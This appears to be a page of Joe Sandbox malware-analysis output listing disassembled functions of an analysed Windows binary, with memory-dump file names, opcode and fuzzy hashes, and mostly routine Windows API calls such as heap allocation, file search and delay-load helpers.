Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: fea9311c1bbcc58cf046fc192371e5c0beb6ef37599f657992c8a45585dbf908
Instruction ID: cb2e74e7096d96f92e4c3f95ccaa25d403a0aaedb4e00a7de838c3bdcab58bf7
Opcode Fuzzy Hash: fea9311c1bbcc58cf046fc192371e5c0beb6ef37599f657992c8a45585dbf908
Instruction Fuzzy Hash: B3110A33700639DF9B32AD2CD84099E77D6AB842607264261FDD6EB648DF35DC0187D0

Function 01009215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0100921A

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: ff71ff36cac491c89ee3df3b949d6564069a63c60eee0b1886ccce2af47c8448
Instruction ID: a5516518c51d1e88399560a690ae40ed458da0b32bbdddd2d6803122b6240b76
Opcode Fuzzy Hash: ff71ff36cac491c89ee3df3b949d6564069a63c60eee0b1886ccce2af47c8448
Instruction Fuzzy Hash: A301A533900929ABDF13ABA8CD809DEB775BFA8654F014115E996B7191DA34C900C7A0

Function 01023C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 01023C3F

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: ca2948b6215143db9662ff26e1177afafa980f8dbb060494f347ce261efd399f
Instruction ID: 5c654ee7116b342b02a3a46c1418474835b8131b5591d5f59751335c8fee03aa
Opcode Fuzzy Hash: ca2948b6215143db9662ff26e1177afafa980f8dbb060494f347ce261efd399f
Instruction Fuzzy Hash: 4BF0A73220022A9F9F124E6EEC1099A7BD9FF49B207204124FB85DF190DB35E420C790

Function 01028E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0102CA2C,00000000,?,01026CBE,?,00000008,?,010291E0,?,?,?), ref: 01028E38

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 1ca9b14d87cd35ae73b6d311ca7b21e72faa09b4c9e1e08fd8752185ff95eb78
Instruction ID: 6e3ad07e0d3cb5a1f467e574a9a54423315807e4e8bdd9bd534dc7f4a81142fb
Opcode Fuzzy Hash: 1ca9b14d87cd35ae73b6d311ca7b21e72faa09b4c9e1e08fd8752185ff95eb78
Instruction Fuzzy Hash: 34E0653960613556EEB126699C04B9F7ACC9F517B4F15C193EDD897080CB65CC0082E1

Function 01005ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 01005AC2

Part of subcall function 0100B505: __EH_prolog.LIBCMT ref: 0100B50A

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 5c9cb1e471cee9b88f5bcca5426f7c0d36ef21cc8cfb1d0eec12008dffda73da
Instruction ID: 95c004d0d7deed5b4b6e06d9f91013bd735eaeffec939151e846667c64675ba9
Opcode Fuzzy Hash: 5c9cb1e471cee9b88f5bcca5426f7c0d36ef21cc8cfb1d0eec12008dffda73da
Instruction Fuzzy Hash: 1C018C30810695DAD726E7B8C0407DDFBA4BF78204F60888D94DA53285CBB81B08D7A2

Function 0100A56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

Part of subcall function 0100A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0100A592,000000FF,?,?), ref: 0100A6C4
Part of subcall function 0100A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0100A592,000000FF,?,?), ref: 0100A6F2
Part of subcall function 0100A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0100A592,000000FF,?,?), ref: 0100A6FE

FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0100A598

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: Find$FileFirst$CloseErrorLast
String ID:
API String ID: 1464966427-0
Opcode ID: 6d7457f10a0d7fc31f6e8336a68044539e04b98b38a236259cc851e548fa7f16
Instruction ID: 756d466e9db7a9a8472cc89dc540bce24e4fd6ca8a202e3e87f9ba7bc4b1c80d
Opcode Fuzzy Hash: 6d7457f10a0d7fc31f6e8336a68044539e04b98b38a236259cc851e548fa7f16
Instruction Fuzzy Hash: 60F05E35009790EAEA6367B88904BCBBBA46F2A332F048A49F1F9531D5C37650948B22

Function 01010E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

SetThreadExecutionState.KERNEL32(00000001), ref: 01010E3D

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: 101240a25dc0115856865d5a50dfc545165bb877ce10b2337d70e74e2bd91fcb
Instruction ID: a647dc6ef2056e2f0035351e986774ff2540b64a2fcbc12faf9c71d53334b519
Opcode Fuzzy Hash: 101240a25dc0115856865d5a50dfc545165bb877ce10b2337d70e74e2bd91fcb
Instruction Fuzzy Hash: 05D0C230B0106A16EA6633396494BFE298B9FE6210F0C0065B2C55B2CECAAE0482A261

Function 0101A626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(00000010), ref: 0101A62C

Part of subcall function 0101A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0101A3DA

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction ID: b756999aa64b5d282eb878efbe0ab4a01eab456bea9e215b03cb9147fe51894d
Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction Fuzzy Hash: 3DD0A93030120AFAEF426B21CC02AAF7AA9EB58240F008421BCC2C6184EAB9D9109261

Function 0101DD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,01011B3E), ref: 0101DD92

Part of subcall function 0101B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0101B579
Part of subcall function 0101B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0101B58A
Part of subcall function 0101B568: IsDialogMessageW.USER32(00010442,?), ref: 0101B59E
Part of subcall function 0101B568: TranslateMessage.USER32(?), ref: 0101B5AC
Part of subcall function 0101B568: DispatchMessageW.USER32(?), ref: 0101B5B6

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: 9b6ed345331ff3b54f0b234b7c94673597f7cb20d0bf0a8d405792b3c2dd822e
Instruction ID: 0dbb338a7048243b39e188002a5bb92d0cb4d8cdd38cea8fbcb1ecc6a1ebdd9b
Opcode Fuzzy Hash: 9b6ed345331ff3b54f0b234b7c94673597f7cb20d0bf0a8d405792b3c2dd822e
Instruction Fuzzy Hash: 80D09E71144300BBD6112B51CE06F4A7AB2BB99B04F404955B3C4740B4CA779D61EB11

Function 0101E5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

APIs

DloadProtectSection.DELAYIMP ref: 0101E5E3

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: DloadProtectSection
String ID:
API String ID: 2203082970-0
Opcode ID: d930e5b9385fd8ca8887850c0ba9ca44294a8aa34f83e07c2a4ec37f781d3a9a
Instruction ID: f24ffd3c0d9de15338cb36a0ee711db0cb88598c4778754a3443df5f911b958a
Opcode Fuzzy Hash: d930e5b9385fd8ca8887850c0ba9ca44294a8aa34f83e07c2a4ec37f781d3a9a
Instruction Fuzzy Hash: F6D012B01402459BE763EBACE445F5C77E9B368B60F800545FEC9D645CEB7D8180D705

Function 010098BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(000000FF,010097BE), ref: 010098C8

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 0e67af4597f19861898c331419ecf5b81a5b553dc04a50b0f47363dbc3069fb5
Instruction ID: 1fb0e3154a6043a8d13b8d0db464858d1214f0d85553763f3737c6482a8f597e
Opcode Fuzzy Hash: 0e67af4597f19861898c331419ecf5b81a5b553dc04a50b0f47363dbc3069fb5
Instruction Fuzzy Hash: AAC01274400105C59E73462894440957751AA42279BB486D4D0AC891D3C333C547EB10

Function 0101E1D1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6b27047d551c094225fa10cc201edd48a872d2288f3244810cdc5bb864228367
Instruction ID: 5ff96de9461d4158f60c1b91e5365f93a8f1105dc464786ec99da415e3066450
Opcode Fuzzy Hash: 6b27047d551c094225fa10cc201edd48a872d2288f3244810cdc5bb864228367
Instruction Fuzzy Hash: 85B012E5258101FC30051196DD06CBF111CF6C2A10320842FFCCADC484D8449C410471

Function 0101E1EC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: fab5e3af31f04a0a31b1398938baa0f89f71afdb44e88839223d9ecf3cbb8e7a
Instruction ID: ca840653b39987abb5a73845b38773fea99e3f6d3893212e7b8b6933f2efc414
Opcode Fuzzy Hash: fab5e3af31f04a0a31b1398938baa0f89f71afdb44e88839223d9ecf3cbb8e7a
Instruction Fuzzy Hash: 24B012E525C101EC3005519ADD06CBF111CF6C1910320402FFCCECC084D8445C410571

Function 0101E1F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: bff7b3a8d121b01c051bb420b9bf95d8aba96cf310e8717b5230441f12f3c440
Instruction ID: 0bf389340c27f92d10abb063e0b80ad5b6fff3411c75cd12cbb4e7e8c97b338e
Opcode Fuzzy Hash: bff7b3a8d121b01c051bb420b9bf95d8aba96cf310e8717b5230441f12f3c440
Instruction Fuzzy Hash: 70B012E1258001EC30055656DD05CBF111CF6C1A20320C02FFCCECC184D8449C450471

Function 0101E200 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4bf480fb42819d87d6ea78b6d3be9e05231d8e84a45f5f434e8a7a9d0d54e2cc
Instruction ID: 16b6728ec751a05294144d33f3e699467f803e35b0dea1ccac81917338dd6c99
Opcode Fuzzy Hash: 4bf480fb42819d87d6ea78b6d3be9e05231d8e84a45f5f434e8a7a9d0d54e2cc
Instruction Fuzzy Hash: 9EB012E1368141FD30455256DD05CBF111CF6C0920320812FFCCECC184D8445C850471

Function 0101E20A Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5ad2404d985bae6c0c62a8073c4742a55d3166dffb5b074b7445e39b6b4ef89c
Instruction ID: cd70605c8cdcf644768da5b1626b17a05adff152b0e3ca669021a47e8f7d4e34
Opcode Fuzzy Hash: 5ad2404d985bae6c0c62a8073c4742a55d3166dffb5b074b7445e39b6b4ef89c
Instruction Fuzzy Hash: 38B012E1258001EC30055256DE05CBF111CF6C0920320802FFCCECC184DC445D4A0471

Function 0101E21E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2ae7688a7df7a270238c71aed01d3d17fd48da2f69d9ae0f23d950418f1dec7d
Instruction ID: 10525fe6a56efb750e824890774332c6b5c10526b59e977fc2a31927558e2381
Opcode Fuzzy Hash: 2ae7688a7df7a270238c71aed01d3d17fd48da2f69d9ae0f23d950418f1dec7d
Instruction Fuzzy Hash: 8AB012F1258001FC30055156DD05CBF115CF6C1F10320802FFCCECC084D8449D450471

Function 0101E228 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0825d0a704fd763b3dc4f04e5af1b422bf677ec2c569960e0afc5a6d213a30a0
